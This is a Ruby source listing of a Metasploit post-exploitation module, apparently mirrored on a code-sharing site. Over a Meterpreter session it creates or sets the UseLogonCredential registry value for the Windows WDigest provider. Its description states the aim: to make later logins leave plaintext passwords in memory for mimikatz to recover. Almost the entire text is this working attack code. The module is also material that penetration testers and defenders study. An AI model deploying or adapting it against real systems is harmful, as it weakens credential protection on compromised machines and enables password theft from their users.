Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/wdigest_caching.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::Windows::Registry
8
include Msf::Post::Windows::Version
9
10
WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'.freeze
11
USE_LOGON_CREDENTIAL = 'UseLogonCredential'.freeze
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Windows Post Manage WDigest Credential Caching',
18
'Description' => %q{
19
On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables
20
credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.
21
Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>'],
25
'Platform' => [ 'win' ],
26
'SessionTypes' => [ 'meterpreter' ],
27
'Notes' => {
28
'Stability' => [CRASH_SAFE],
29
'SideEffects' => [CONFIG_CHANGES],
30
'Reliability' => []
31
}
32
)
33
)
34
35
register_options(
36
[
37
OptBool.new('ENABLE', [false, 'Enable the WDigest Credential Cache.', true])
38
]
39
)
40
end
41
42
def run
43
hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
44
print_status("Running module against #{hostname} (#{session.session_host})")
45
46
# Check if OS is 8/2012 or newer. If not, no need to set the registry key
47
# Can be backported to Windows 7, 2k8R2 but defaults to enabled...
48
version = get_version_info
49
if version.build_number < Msf::WindowsVersion::Win7_SP0
50
print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...')
51
else
52
datastore['ENABLE'] ? wdigest_enable : wdigest_disable
53
end
54
end
55
56
def get_key
57
# Check if the key exists. Not present by default
58
print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...")
59
wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL)
60
key_exists = !wdvalue.nil?
61
62
print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") if key_exists
63
return wdvalue
64
rescue Rex::Post::Meterpreter::RequestError => e
65
fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
66
end
67
68
def wdigest_enable
69
wdvalue = get_key
70
key_exists = !wdvalue.nil?
71
72
# If it is not present, create it
73
if wdvalue == 1
74
print_good('Registry value is already set. WDigest Security Provider is enabled')
75
return
76
end
77
78
verb = key_exists ? 'Setting' : 'Creating'
79
print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 1...")
80
if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD')
81
print_good('WDigest Security Provider enabled')
82
else
83
print_error('Unable to access registry key - insufficient privileges?')
84
end
85
rescue Rex::Post::Meterpreter::RequestError => e
86
fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
87
end
88
89
def wdigest_disable
90
wdvalue = get_key
91
key_exists = !wdvalue.nil?
92
93
# If it is not present, create it
94
if wdvalue == 0
95
print_good('Registry value is already set. WDigest Security Provider is disabled')
96
return
97
end
98
99
verb = key_exists ? 'Setting' : 'Creating'
100
print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 0...")
101
if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 0, 'REG_DWORD')
102
print_good('WDigest Security Provider disabled')
103
else
104
print_error('Unable to access registry key - insufficient privileges?')
105
end
106
rescue Rex::Post::Meterpreter::RequestError => e
107
fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
108
end
109
end
110
111